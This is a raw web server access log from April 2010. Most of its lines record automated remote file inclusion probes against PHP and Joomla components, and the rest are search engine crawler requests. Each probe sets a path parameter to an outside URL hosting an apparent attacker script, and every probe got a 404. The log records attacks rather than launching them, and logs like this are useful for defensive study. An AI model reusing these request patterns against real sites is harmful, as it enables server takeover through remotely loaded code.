212.227.141.53 - - [19/Apr/2010:06:02:42 -0500] "GET /logs/errors.php?error=http://www.syrianobles.com/website/cv/zfxid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
110.45.143.142 - - [19/Apr/2010:06:03:06 -0500] "GET /logs//admin/common.inc.php?base_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
110.45.143.142 - - [19/Apr/2010:06:03:06 -0500] "GET //admin/common.inc.php?base_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
110.45.143.142 - - [19/Apr/2010:06:03:06 -0500] "GET /logs/access_log.1263686400//admin/common.inc.php?base_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
121.190.102.21 - - [19/Apr/2010:06:03:19 -0500] "GET //admin/common.inc.php?base_path=http://www.howtolisten.kr/lct/exam3/111/id1.txt???? HTTP/1.1" 404 305 "-""Mozilla/5.0"
121.190.102.21 - - [19/Apr/2010:06:03:19 -0500] "GET /logs//admin/common.inc.php?base_path=http://www.howtolisten.kr/lct/exam3/111/id1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.190.102.21 - - [19/Apr/2010:06:03:19 -0500] "GET /logs/access_log.1263686400//admin/common.inc.php?base_path=http://www.howtolisten.kr/lct/exam3/111/id1.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:06:03:53 -0500] "GET /errors.php?error=http://www.syrianobles.com/website/cv/zfxid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:06:03:53 -0500] "GET /logs/errors.php?error=http://www.syrianobles.com/website/cv/zfxid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.190.102.21 - - [19/Apr/2010:06:03:55 -0500] "GET //admin/common.inc.php?base_path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
121.190.102.21 - - [19/Apr/2010:06:03:55 -0500] "GET /logs//admin/common.inc.php?base_path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.190.102.21 - - [19/Apr/2010:06:03:55 -0500] "GET /logs/access_log.1263686400//admin/common.inc.php?base_path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:06:03:57 -0500] "GET /logs/access_log.1232236800/errors.php?error=http://www.syrianobles.com/website/cv/zfxid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
110.45.143.142 - - [19/Apr/2010:06:04:52 -0500] "GET /logs//admin/common.inc.php?base_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
110.45.143.142 - - [19/Apr/2010:06:04:53 -0500] "GET //admin/common.inc.php?base_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
110.45.143.142 - - [19/Apr/2010:06:04:53 -0500] "GET /logs/access_log.1263686400//admin/common.inc.php?base_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
94.136.59.102 - - [19/Apr/2010:06:09:34 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
92.48.73.232 - - [19/Apr/2010:06:09:40 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
213.175.207.62 - - [19/Apr/2010:06:10:11 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
87.250.255.243 - - [19/Apr/2010:06:13:56 -0500] "GET /logs/access_log.1235865600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
64.76.136.36 - - [19/Apr/2010:06:15:44 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.amkhorice.cz/eng/img/gid.gif?%0D?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
64.76.136.36 - - [19/Apr/2010:06:15:44 -0500] "GET /logs/access_log.1217548800//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.amkhorice.cz/eng/img/gid.gif?%0D?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
64.76.136.36 - - [19/Apr/2010:06:15:45 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.amkhorice.cz/eng/img/gid.gif?%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
64.76.136.36 - - [19/Apr/2010:06:15:47 -0500] "GET /logs/access_log.1217462400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.amkhorice.cz/eng/img/gid.gif?%0D?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
221.212.177.254 - - [19/Apr/2010:06:16:12 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 318 "-""libwww-perl/5.65"
200.62.142.217 - - [19/Apr/2010:06:16:52 -0500] "GET /logs/phphtml.php?htmlclass_path=http://ruitershop.com/nieuws_img/gh1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
200.62.142.217 - - [19/Apr/2010:06:16:52 -0500] "GET /phphtml.php?htmlclass_path=http://ruitershop.com/nieuws_img/gh1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
200.62.142.217 - - [19/Apr/2010:06:16:52 -0500] "GET /logs/access_log.1219708800%20%20/phphtml.php?htmlclass_path=http://ruitershop.com/nieuws_img/gh1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
64.76.136.36 - - [19/Apr/2010:06:17:33 -0500] "GET /logs/access_log.1236297600%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.amkhorice.cz/eng/img/gid.gif?%0D?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
222.236.47.182 - - [19/Apr/2010:06:20:18 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.236.47.182 - - [19/Apr/2010:06:20:18 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.236.47.182 - - [19/Apr/2010:06:20:18 -0500] "GET /logs/access_log.1228089600//admin/business_inc/saveserver.php?thisdir=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
92.48.73.232 - - [19/Apr/2010:06:21:24 -0500] "GET /logs/access_log.1270598400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
92.48.73.232 - - [19/Apr/2010:06:21:24 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
92.48.73.232 - - [19/Apr/2010:06:21:24 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
207.46.204.186 - - [19/Apr/2010:06:21:59 -0500] "GET /logs/access_log.1170028800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.62.142.217 - - [19/Apr/2010:06:23:53 -0500] "GET /logs/access_log.1220054400%20%20/phphtml.php?htmlclass_path=http://ruitershop.com/nieuws_img/gh1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
213.251.189.204 - - [19/Apr/2010:06:26:50 -0500] "GET /logs/access_log.1270598400//write_update.php?board_skin_path=http://freecopts.net/arabic//zfxid.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
213.251.189.204 - - [19/Apr/2010:06:26:50 -0500] "GET //write_update.php?board_skin_path=http://freecopts.net/arabic//zfxid.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
213.251.189.204 - - [19/Apr/2010:06:26:50 -0500] "GET /logs//write_update.php?board_skin_path=http://freecopts.net/arabic//zfxid.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:06:26:53 -0500] "GET /logs/access_log.1156377600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
213.175.207.62 - - [19/Apr/2010:06:30:25 -0500] "GET /logs/access_log.1270598400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
213.175.207.62 - - [19/Apr/2010:06:30:26 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
213.175.207.62 - - [19/Apr/2010:06:30:26 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
65.55.207.96 - - [19/Apr/2010:06:33:04 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.182 - - [19/Apr/2010:06:33:05 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.236.47.182 - - [19/Apr/2010:06:33:08 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.236.47.182 - - [19/Apr/2010:06:33:08 -0500] "GET /logs/access_log.1228089600//admin/business_inc/saveserver.php?thisdir=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:06:35:00 -0500] "GET /logs/access_log.1219017600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
92.48.73.232 - - [19/Apr/2010:06:35:21 -0500] "GET /logs/access_log.1268265600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
213.175.207.62 - - [19/Apr/2010:06:35:52 -0500] "GET /logs/access_log.1268265600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
207.46.195.239 - - [19/Apr/2010:06:40:59 -0500] "GET /logs/access_log.1197417600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
76.73.79.11 - - [19/Apr/2010:06:45:47 -0500] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
76.73.79.11 - - [19/Apr/2010:06:45:48 -0500] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
76.73.79.11 - - [19/Apr/2010:06:45:48 -0500] "GET /logs/access_log.1220054400%20%20/modules/4nAlbum/public/displayCategory.php?basepath=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
119.235.18.81 - - [19/Apr/2010:06:47:08 -0500] "GET /logs//pages_php/p_aidcon_conseils/index.php?FM=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 327 "-""Mozilla/5.0"
119.235.18.81 - - [19/Apr/2010:06:47:11 -0500] "GET /logs/access_log.1262476800//pages_php/p_aidcon_conseils/index.php?FM=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 349 "-""Mozilla/5.0"
119.235.18.81 - - [19/Apr/2010:06:47:11 -0500] "GET //pages_php/p_aidcon_conseils/index.php?FM=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 322 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:06:48:22 -0500] "GET /logs/access_log.1250208000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
76.73.79.11 - - [19/Apr/2010:06:49:19 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
76.73.79.11 - - [19/Apr/2010:06:49:19 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
76.73.79.11 - - [19/Apr/2010:06:49:19 -0500] "GET /logs/access_log.1220054400%20%20//modules/agendax/addevent.inc.php?agendax_path=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:06:49:28 -0500] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:06:49:28 -0500] "GET /logs/access_log.1220054400/modules/agendax/addevent.inc.php?agendax_path=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:06:49:28 -0500] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
99.198.106.194 - - [19/Apr/2010:06:50:45 -0500] "GET /logs//index.php?option=com_rsgallery2&mosConfig.absolute.path=http://sbmgolf.com/baner.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
99.198.106.194 - - [19/Apr/2010:06:50:45 -0500] "GET //index.php?option=com_rsgallery2&mosConfig.absolute.path=http://sbmgolf.com/baner.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
99.198.106.194 - - [19/Apr/2010:06:50:45 -0500] "GET /logs/access_log.1238889600//index.php?option=com_rsgallery2&mosConfig.absolute.path=http://sbmgolf.com/baner.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.204.190 - - [19/Apr/2010:06:50:59 -0500] "GET /logs/access_log.1225152000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.244 - - [19/Apr/2010:06:51:00 -0500] "GET /logs/access_log.1179446400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
173.236.29.218 - - [19/Apr/2010:06:51:02 -0500] "GET /logs//index.php?option=com_rsgallery2&mosConfig.absolute.path=http://sbmgolf.com/baner.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
173.236.29.218 - - [19/Apr/2010:06:51:02 -0500] "GET /logs/access_log.1238889600//index.php?option=com_rsgallery2&mosConfig.absolute.path=http://sbmgolf.com/baner.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
173.236.29.218 - - [19/Apr/2010:06:51:02 -0500] "GET //index.php?option=com_rsgallery2&mosConfig.absolute.path=http://sbmgolf.com/baner.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:06:51:56 -0500] "GET /logs/access_log.1220054400/modules/My_eGallery/index.php?basepath=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:06:51:56 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:06:51:56 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:06:54:41 -0500] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:06:54:41 -0500] "GET /logs/access_log.1220054400/modules/agendax/addevent.inc.php?agendax_path=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:06:54:41 -0500] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.199.179 - - [19/Apr/2010:06:56:03 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [19/Apr/2010:06:58:46 -0500] "GET /logs/access_log.1174348800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
221.212.177.254 - - [19/Apr/2010:06:59:44 -0500] "GET /logs/access_log.1270598400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 345 "-""libwww-perl/5.65"
221.212.177.254 - - [19/Apr/2010:06:59:45 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 318 "-""libwww-perl/5.65"
200.62.142.217 - - [19/Apr/2010:06:59:45 -0500] "GET /logs/access_log.1219708800/phphtml.php?htmlclass_path=http://ruitershop.com/nieuws_img/gh1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
221.212.177.254 - - [19/Apr/2010:06:59:45 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 323 "-""libwww-perl/5.65"
222.236.47.182 - - [19/Apr/2010:06:59:49 -0500] "GET /logs//include/write.php?dir=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
222.236.47.182 - - [19/Apr/2010:06:59:54 -0500] "GET //include/write.php?dir=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
222.236.47.182 - - [19/Apr/2010:06:59:54 -0500] "GET /logs/access_log.1220054400%20%20//include/write.php?dir=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
200.62.142.217 - - [19/Apr/2010:06:59:56 -0500] "GET /logs/access_log.1220054400/phphtml.php?htmlclass_path=http://ruitershop.com/nieuws_img/gh1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
207.46.199.48 - - [19/Apr/2010:07:00:59 -0500] "GET /logs/access_log.1239840000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.182 - - [19/Apr/2010:07:02:16 -0500] "GET /logs//include/write.php?dir=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
222.236.47.182 - - [19/Apr/2010:07:02:17 -0500] "GET //include/write.php?dir=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
222.236.47.182 - - [19/Apr/2010:07:02:17 -0500] "GET /logs/access_log.1220054400%20%20//include/write.php?dir=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
76.73.79.11 - - [19/Apr/2010:07:04:08 -0500] "GET /logs/access_log.1220054400//modules/agendax/addevent.inc.php?agendax_path=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:07:09:09 -0500] "GET /logs/access_log.1227225600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.91 - - [19/Apr/2010:07:11:48 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.91 - - [19/Apr/2010:07:12:29 -0500] "GET /logs/access_log.1172793600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.131.106.16 - - [19/Apr/2010:07:12:34 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
88.131.106.16 - - [19/Apr/2010:07:12:35 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
203.19.4.18 - - [19/Apr/2010:07:13:06 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
207.46.204.241 - - [19/Apr/2010:07:13:31 -0500] "GET /logs/access_log.1241308800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.240 - - [19/Apr/2010:07:15:29 -0500] "GET /logs/access_log.1205280000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [19/Apr/2010:07:18:04 -0500] "GET /logs/access_log.1167609600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
72.46.157.102 - - [19/Apr/2010:07:18:15 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.pmsaluminium.com/levha/anket/.safe?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.46.157.102 - - [19/Apr/2010:07:18:15 -0500] "GET /logs/access_log.1204675200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.pmsaluminium.com/levha/anket/.safe?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.46.157.102 - - [19/Apr/2010:07:18:15 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.pmsaluminium.com/levha/anket/.safe?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
61.67.201.187 - - [19/Apr/2010:07:20:48 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
61.67.201.187 - - [19/Apr/2010:07:20:48 -0500] "GET /logs/access_log.1260662400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
61.67.201.187 - - [19/Apr/2010:07:20:49 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
61.67.201.187 - - [19/Apr/2010:07:20:53 -0500] "GET /logs/access_log.1266192000/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
61.67.201.187 - - [19/Apr/2010:07:23:30 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
61.67.201.187 - - [19/Apr/2010:07:23:30 -0500] "GET /logs/access_log.1266192000/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
61.67.201.187 - - [19/Apr/2010:07:23:30 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
61.67.201.187 - - [19/Apr/2010:07:23:30 -0500] "GET /logs/access_log.1260662400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
61.67.201.187 - - [19/Apr/2010:07:25:07 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
61.67.201.187 - - [19/Apr/2010:07:25:07 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
61.67.201.187 - - [19/Apr/2010:07:25:07 -0500] "GET /logs/access_log.1266192000/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
211.174.185.131 - - [19/Apr/2010:07:25:08 -0500] "GET //write_update.php?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.174.185.131 - - [19/Apr/2010:07:25:08 -0500] "GET /logs//write_update.php?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
211.174.185.131 - - [19/Apr/2010:07:25:08 -0500] "GET /logs/access_log.1270598400%20%20//write_update.php?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
61.67.201.187 - - [19/Apr/2010:07:25:13 -0500] "GET /logs/access_log.1260662400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
207.46.199.51 - - [19/Apr/2010:07:25:59 -0500] "GET /logs/access_log.1164499200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.174.185.131 - - [19/Apr/2010:07:27:28 -0500] "GET //write_update.php?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.174.185.131 - - [19/Apr/2010:07:27:28 -0500] "GET /logs//write_update.php?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
211.174.185.131 - - [19/Apr/2010:07:27:28 -0500] "GET /logs/access_log.1264291200//write_update.php?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.174.185.131 - - [19/Apr/2010:07:27:28 -0500] "GET /logs/access_log.1263427200//write_update.php?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
61.67.201.187 - - [19/Apr/2010:07:28:32 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
61.67.201.187 - - [19/Apr/2010:07:28:32 -0500] "GET /logs/access_log.1266192000/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
61.67.201.187 - - [19/Apr/2010:07:28:32 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
61.67.201.187 - - [19/Apr/2010:07:28:32 -0500] "GET /logs/access_log.1260662400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
61.67.201.187 - - [19/Apr/2010:07:29:00 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
61.67.201.187 - - [19/Apr/2010:07:29:01 -0500] "GET /logs/access_log.1260662400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
61.67.201.187 - - [19/Apr/2010:07:29:01 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
61.67.201.187 - - [19/Apr/2010:07:29:01 -0500] "GET /logs/access_log.1266192000/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
